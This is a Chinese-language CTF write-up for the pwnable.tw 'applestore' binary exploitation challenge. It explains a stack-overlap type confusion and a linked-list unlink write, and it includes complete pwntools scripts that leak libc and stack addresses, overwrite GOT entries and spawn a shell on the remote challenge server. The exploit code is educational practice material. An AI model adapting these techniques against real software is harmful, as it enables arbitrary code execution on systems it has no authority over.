I is so vegetable:(,我tcl又由于忙于毕设和各种比赛(划水)各种耽误,到今天才真正把这题搞出来
存储结构
0x804B070链表头struct _mycart_binlist{ int *name; //ebp-0x20 int price; //ebp-0x1c struct _mycart_binlist *next; //ebp-0x18 struct _mycart_binlist *pre; //ebp-0x14}
insert
int __cdecl insert(int a1){ int result; // eax _DWORD *i; // [esp+Ch] [ebp-4h] for ( i = &myCart; i[2]; i = (_DWORD *)i[2] ) ; i[2] = a1; // the_last_mycart->next=inserted result = a1; *(_DWORD *)(a1 + 12) = i; // inserted->pre=the_last_mycart return result;}
checkout
unsigned int checkout(){ int v1; // [esp+10h] [ebp-28h] char *v2; // [esp+18h] [ebp-20h] int v3; // [esp+1Ch] [ebp-1Ch] unsigned int v4; // [esp+2Ch] [ebp-Ch] v4 = __readgsdword(0x14u); v1 = cart(); if ( v1 == 7174 ) { puts("*: iPhone 8 - $1"); asprintf(&v2, "%s", "iPhone 8"); v3 = 1; // price=1 insert((int)&v2); v1 = 7175; } printf("Total: $%d\n", v1); puts("Want to checkout? Maybe next time!"); return __readgsdword(0x14u) ^ v4;}
这里存在问题的应该是checkout的insert,用贪心的思想求解下v1=7174各个商品的数量
717414*499=698613*499=648712*499=5988 118611*499=5489 168510*499=4990 21849*499=4491 26838*499=3992 31827*499=3493 36816*499=2994 41805*499=2495 4679-99*21=2600100x+200y+300z=2600 =>x+2y+3z=26x+y+z=21 =>y+2z=5 y=1 z=2 x=18 c=5199x 299y 399z 499c
写个脚本验证下
from pwn import *
context.log_level=‘DEBUG‘
p=process(‘./applestore‘)
def add(idx):
p.sendlineafter(‘>‘,‘2‘)
p.sendlineafter(‘Device Number> ‘,str(idx))
for i in range(0,18):
add(1)
add(2)
for i in range(0,2):
add(4)
for i in range(0,5):
add(3)
gdb.attach(p,gdbscript=‘b *0x08048B98\n‘)
p.interactive()
这里存在的问题是delete时执行my_read直接在栈中保存输入的字符串引起一个类型混淆,利用delete双向链表的断链操作DWORD_SHOOT得到一个任意地址写的机会,修改GOT即可导致任意代码执行。
unsigned int delete(){ signed int idx; // [esp+10h] [ebp-38h] _DWORD *v2; // [esp+14h] [ebp-34h] int delete_obj; // [esp+18h] [ebp-30h] int next; // [esp+1Ch] [ebp-2Ch] int pre; // [esp+20h] [ebp-28h] char nptr; // [esp+26h] [ebp-22h] unsigned int v7; // [esp+3Ch] [ebp-Ch] v7 = __readgsdword(0x14u); idx = 1; v2 = (_DWORD *)dword_804B070; printf("Item Number> "); fflush(stdout); my_read(&nptr, 0x15u); // 栈里边直接保存输入的字符串,虽然不会溢出,但这里会造成类型混淆 delete_obj = atoi(&nptr); while ( v2 ) { if ( idx == delete_obj ) { next = v2[2]; // next pre = v2[3]; // pre if ( pre ) *(_DWORD *)(pre + 8) = next; // victim->pre->next=victim->next if ( next ) *(_DWORD *)(next + 12) = pre; // victim->next->pre=victim->pre printf("Remove %d:%s from your shopping cart.\n", idx, *v2); return __readgsdword(0x14u) ^ v7; } ++idx; v2 = (_DWORD *)v2[2]; } return __readgsdword(0x14u) ^ v7;}
这里引起类型混淆的本质原因是我们执行checkout插入的V2距离ebp为EBP-20H,执行完checkout只是抬高栈帧,并不会销毁函数栈;而此时我们调用delete,会在调用checkout结束的位置开辟栈帧,这样得到的函数栈就和checkout的函数栈重叠,而delete会在栈中直接保存输入的字符串(EBP-22H的位置),就会引起一次类型混淆
handler ebp___ 38h esp__checkout ebp__ delete ebp__ 38h 48h V2=ebp-20h nptr=ebp-22h esp__ esp__
DWORD_SHOT并不可行,如果我们如下构造struct执行DWORD_SHOT的话,虽然GOT表可写,但是由于双向链表断链过程会执行victim->pre=victim->next,即read@got会写入*system@got+12的位置,而*system@got+12位于libc text段,肯定不可写,这里会崩溃。
struct{ *name => padding price => padding *nexe => read@got *pre => system@got}
以下脚本可以验证DWORD_SHOT不可行。so,how to get it pwned?
from pwn import *context.log_level=‘DEBUG‘p=process(‘./applestore‘)elf=ELF(‘./applestore‘)libc=ELF(‘/lib/i386-linux-gnu/libc-2.28.so‘)def add(idx): p.sendlineafter(‘>‘,‘2‘) p.sendlineafter(‘Device Number> ‘,str(idx))def delete(idx): p.sendlineafter(‘>‘,‘3‘) p.sendlineafter(‘Item Number>‘,str(idx))def checkout(): p.sendlineafter(‘>‘,‘5‘) p.sendlineafter(‘>‘,‘y‘)def cart(payload): p.sendlineafter(‘>‘,‘4‘) p.sendlineafter(‘>‘,str(payload))for i in range(0,18): add(1)add(2)for i in range(0,2): add(4)for i in range(0,5): add(3)checkout()payload=‘y\x0a‘+p32(elf.got[‘read‘])+p32(1)+p32(0)+p32(0)cart(payload)p.recvuntil(‘27: ‘)read_got=u32(p.recv(4))libc_base=read_got-libc.sym[‘read‘]success(‘libc_base:‘+hex(libc_base))success(‘read_got:‘+hex(read_got))#gdb.attach(p,gdbscript=‘b *0x08048B98\n‘) #b insert()gdb.attach(p,gdbscript=‘‘‘ b *0x080489F0 break *0x080489FB if $[$ebp-0x38]==27 ‘‘‘) #b delete_objsys_got=libc_base+libc.sym[‘system‘]success(‘system:‘+hex(sys_got))payload=‘\x32\x37\x00\x20‘+‘b‘*6+p32(read_got-8)+p32(sys_got)delete(payload)#gdb.attach(p,gdbscript=‘b *0x080489FB\n‘)p.interactive()
由于delete中我们有一次任意地址写的机会,而在执行完delete返回到handler时会再次引用栈内存ebp-0x22(在这个位置读入),所以我们考虑修改ebp的值,进而覆盖asprintf@got和atoi@got(这两个got的地址是相邻的),asprintf@got覆盖成‘$0\x00\x00‘(4字节),atoi@got覆盖成sys_addr即可。这样在0x8048c16执行atoi时即执行system(‘$0‘)即可getshell
from pwn import *context.log_level=‘DEBUG‘elf=ELF(‘./applestore‘)local=0if local: p=process(‘./applestore‘) libc=ELF(‘/lib/i386-linux-gnu/libc-2.28.so‘)else: p=remote(‘chall.pwnable.tw‘,10104) libc=ELF(‘./libc_32.so.6‘)def add(idx): p.sendlineafter(‘>‘,‘2‘) p.sendlineafter(‘Device Number> ‘,str(idx))def delete(idx): p.sendlineafter(‘>‘,‘3‘) p.sendlineafter(‘Item Number>‘,str(idx))def checkout(): p.sendlineafter(‘>‘,‘5‘) p.sendlineafter(‘>‘,‘y‘)def cart(payload): p.sendlineafter(‘>‘,‘4‘) p.sendlineafter(‘>‘,str(payload))for i in range(0,18): add(1)add(2)for i in range(0,2): add(4)for i in range(0,5): add(3)checkout()payload=‘y\x0a‘+p32(elf.got[‘read‘])+p32(1)+p32(0)+p32(0)cart(payload)p.recvuntil(‘27: ‘)read_got=u32(p.recv(4))libc.address=read_got-libc.sym[‘read‘]env=libc.sym[‘environ‘]success(‘libc_base:‘+hex(libc.address))success(‘read_got:‘+hex(read_got))payload=‘y\x0a‘+p32(env)+p32(1)+p32(0)+p32(0)cart(payload)p.recvuntil(‘27: ‘)stack_env=u32(p.recv(4))success(‘stack_env:‘+hex(stack_env))ebp=stack_env-0x104success(‘stack_ebp:‘+hex(ebp))#gdb.attach(p,gdbscript=‘b *0x08048999\n‘)asprintf_got=elf.got[‘asprintf‘]atoi_got=elf.got[‘atoi‘]sys=libc.sym[‘system‘]payload=‘27‘+p32(sys)+p32(1)+p32(ebp-12)+p32(asprintf_got+0x22)if local: gdb.attach(p,gdbscript=‘‘‘ b *0x080489F0\n b *0x08048A6F\n b *0x8048c0b\n ‘‘‘)delete(payload)p.recvuntil(‘from your shopping cart.‘)payload=‘$0\x00\x00‘+p32(sys)p.sendline(payload)p.interactive()